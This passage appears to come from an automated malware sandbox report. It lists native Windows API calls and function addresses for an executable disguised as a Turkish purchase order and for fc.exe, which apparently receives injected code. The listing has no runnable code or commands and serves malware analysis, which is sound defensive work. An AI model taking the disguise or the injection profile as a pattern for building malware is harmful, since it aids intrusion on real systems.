            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932D30 NtUnmapViewOfSection,3_2_01932D30
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932CA0 NtQueryInformationToken,3_2_01932CA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932CC0 NtQueryVirtualMemory,3_2_01932CC0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932CF0 NtOpenProcess,3_2_01932CF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932C00 NtQueryInformationProcess,3_2_01932C00
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932C60 NtCreateKey,3_2_01932C60
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932F90 NtProtectVirtualMemory,3_2_01932F90
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932FB0 NtResumeThread,3_2_01932FB0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932FA0 NtQuerySection,3_2_01932FA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932FE0 NtCreateFile,3_2_01932FE0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932F30 NtCreateSection,3_2_01932F30
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932F60 NtCreateProcessEx,3_2_01932F60
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932E80 NtReadVirtualMemory,3_2_01932E80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932EA0 NtAdjustPrivilegesToken,3_2_01932EA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932EE0 NtQueueApcThread,3_2_01932EE0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932E30 NtWriteVirtualMemory,3_2_01932E30
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01933090 NtSetValueKey,3_2_01933090
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01933010 NtOpenDirectoryObject,3_2_01933010
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019339B0 NtGetContextThread,3_2_019339B0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01933D10 NtOpenProcessToken,3_2_01933D10
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01933D70 NtOpenThread,3_2_01933D70
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D44340 NtSetContextThread,LdrInitializeThunk,9_2_02D44340
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D44650 NtSuspendThread,LdrInitializeThunk,9_2_02D44650
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42AD0 NtReadFile,LdrInitializeThunk,9_2_02D42AD0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42AF0 NtWriteFile,LdrInitializeThunk,9_2_02D42AF0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_02D42BF0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42BE0 NtQueryValueKey,LdrInitializeThunk,9_2_02D42BE0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_02D42BA0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42B60 NtClose,LdrInitializeThunk,9_2_02D42B60
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42EE0 NtQueueApcThread,LdrInitializeThunk,9_2_02D42EE0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_02D42E80
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42FE0 NtCreateFile,LdrInitializeThunk,9_2_02D42FE0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42FB0 NtResumeThread,LdrInitializeThunk,9_2_02D42FB0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42F30 NtCreateSection,LdrInitializeThunk,9_2_02D42F30
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_02D42CA0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_02D42C70
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42C60 NtCreateKey,LdrInitializeThunk,9_2_02D42C60
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42DD0 NtDelayExecution,LdrInitializeThunk,9_2_02D42DD0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_02D42DF0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42D10 NtMapViewOfSection,LdrInitializeThunk,9_2_02D42D10
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_02D42D30
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D435C0 NtCreateMutant,LdrInitializeThunk,9_2_02D435C0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D439B0 NtGetContextThread,LdrInitializeThunk,9_2_02D439B0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42AB0 NtWaitForSingleObject,9_2_02D42AB0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42B80 NtQueryInformationFile,9_2_02D42B80
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42EA0 NtAdjustPrivilegesToken,9_2_02D42EA0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42E30 NtWriteVirtualMemory,9_2_02D42E30
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42F90 NtProtectVirtualMemory,9_2_02D42F90
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42FA0 NtQuerySection,9_2_02D42FA0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42F60 NtCreateProcessEx,9_2_02D42F60
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42CC0 NtQueryVirtualMemory,9_2_02D42CC0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42CF0 NtOpenProcess,9_2_02D42CF0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42C00 NtQueryInformationProcess,9_2_02D42C00
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42DB0 NtEnumerateKey,9_2_02D42DB0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D42D00 NtSetInformationFile,9_2_02D42D00
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D43090 NtSetValueKey,9_2_02D43090
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D43010 NtOpenDirectoryObject,9_2_02D43010
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D43D70 NtOpenThread,9_2_02D43D70
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D43D10 NtOpenProcessToken,9_2_02D43D10
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003B80C0 NtDeleteFile,9_2_003B80C0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003B8160 NtClose,9_2_003B8160
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003B82B0 NtAllocateVirtualMemory,9_2_003B82B0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003B7E70 NtCreateFile,9_2_003B7E70
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003B7FD0 NtReadFile,9_2_003B7FD0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019920003_2_01992000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190E3F03_2_0190E3F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C03E63_2_019C03E6
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BA3523_2_019BA352
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019802C03_2_019802C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A02743_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C05913_2_019C0591
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019005353_2_01900535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019AE4F63_2_019AE4F6
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A44203_2_019A4420
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B24463_2_019B2446
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FC7C03_2_018FC7C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019247503_2_01924750
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019007703_2_01900770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191C6E03_2_0191C6E0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019029A03_2_019029A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019CA9A63_2_019CA9A6
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019169623_2_01916962
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018E68B83_2_018E68B8
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192E8F03_2_0192E8F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190A8403_2_0190A840
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019028403_2_01902840
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B6BD73_2_019B6BD7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BAB403_2_019BAB40
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FEA803_2_018FEA80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01918DBF3_2_01918DBF
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FADE03_2_018FADE0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199CD1F3_2_0199CD1F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190AD003_2_0190AD00
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0CB53_2_019A0CB5
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F0CF23_2_018F0CF2
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900C003_2_01900C00
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197EFA03_2_0197EFA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F2FC83_2_018F2FC8
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01920F303_2_01920F30
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A2F303_2_019A2F30
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01942F283_2_01942F28
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01974F403_2_01974F40
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01912E903_2_01912E90
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BCE933_2_019BCE93
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BEEDB3_2_019BEEDB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BEE263_2_019BEE26
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900E593_2_01900E59
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190B1B03_2_0190B1B0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019CB16B3_2_019CB16B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EF1723_2_018EF172
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0193516C3_2_0193516C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019070C03_2_019070C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019AF0CC3_2_019AF0CC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B70E93_2_019B70E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BF0E03_2_019BF0E0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0194739A3_2_0194739A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B132D3_2_019B132D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018ED34C3_2_018ED34C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019052A03_2_019052A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191B2C03_2_0191B2C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191D2F03_2_0191D2F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A12ED3_2_019A12ED
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199D5B03_2_0199D5B0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C95C33_2_019C95C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B75713_2_019B7571
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BF43F3_2_019BF43F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F14603_2_018F1460
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BF7B03_2_019BF7B0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B16CC3_2_019B16CC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019456303_2_01945630
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019959103_2_01995910
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019099503_2_01909950
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191B9503_2_0191B950
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019038E03_2_019038E0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196D8003_2_0196D800
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191FB803_2_0191FB80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01975BF03_2_01975BF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0193DBF93_2_0193DBF9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BFB763_2_019BFB76
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01945AA03_2_01945AA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199DAAC3_2_0199DAAC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A1AA33_2_019A1AA3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019ADAC63_2_019ADAC6
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BFA493_2_019BFA49
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B7A463_2_019B7A46
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01973A6C3_2_01973A6C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191FDC03_2_0191FDC0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B1D5A3_2_019B1D5A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01903D403_2_01903D40
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B7D733_2_019B7D73
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BFCF23_2_019BFCF2
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01979C323_2_01979C32
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01901F923_2_01901F92
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BFFB13_2_019BFFB1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018C3FD53_2_018C3FD5
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018C3FD23_2_018C3FD2
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BFF093_2_019BFF09
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01909EB03_2_01909EB0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D902C09_2_02D902C0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DB02749_2_02DB0274
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D1E3F09_2_02D1E3F0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DD03E69_2_02DD03E6
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCA3529_2_02DCA352
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DA20009_2_02DA2000
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DC81CC9_2_02DC81CC
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DD01AA9_2_02DD01AA
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DC41A29_2_02DC41A2
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D981589_2_02D98158
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DAA1189_2_02DAA118
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D001009_2_02D00100
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D2C6E09_2_02D2C6E0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D0C7C09_2_02D0C7C0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D347509_2_02D34750
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D107709_2_02D10770
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DBE4F69_2_02DBE4F6
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DC24469_2_02DC2446
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DB44209_2_02DB4420
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DD05919_2_02DD0591
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D105359_2_02D10535
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D0EA809_2_02D0EA80
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DC6BD79_2_02DC6BD7
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCAB409_2_02DCAB40
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D3E8F09_2_02D3E8F0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02CF68B89_2_02CF68B8
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D1A8409_2_02D1A840
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D128409_2_02D12840
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D129A09_2_02D129A0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DDA9A69_2_02DDA9A6
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D269629_2_02D26962
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCEEDB9_2_02DCEEDB
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D22E909_2_02D22E90
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCCE939_2_02DCCE93
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D10E599_2_02D10E59
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCEE269_2_02DCEE26
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D02FC89_2_02D02FC8
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D8EFA09_2_02D8EFA0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D84F409_2_02D84F40
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D30F309_2_02D30F30
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DB2F309_2_02DB2F30
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D52F289_2_02D52F28
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D00CF29_2_02D00CF2
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DB0CB59_2_02DB0CB5
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D10C009_2_02D10C00
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D0ADE09_2_02D0ADE0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D28DBF9_2_02D28DBF
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DACD1F9_2_02DACD1F
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D1AD009_2_02D1AD00
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D2B2C09_2_02D2B2C0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D2D2F09_2_02D2D2F0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DB12ED9_2_02DB12ED
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D152A09_2_02D152A0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D5739A9_2_02D5739A
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02CFD34C9_2_02CFD34C
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DC132D9_2_02DC132D
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D170C09_2_02D170C0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DBF0CC9_2_02DBF0CC
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DC70E99_2_02DC70E9
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCF0E09_2_02DCF0E0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D1B1B09_2_02D1B1B0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DDB16B9_2_02DDB16B
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D4516C9_2_02D4516C
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02CFF1729_2_02CFF172
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DC16CC9_2_02DC16CC
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D556309_2_02D55630
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCF7B09_2_02DCF7B0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D014609_2_02D01460
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCF43F9_2_02DCF43F
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DAD5B09_2_02DAD5B0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DC75719_2_02DC7571
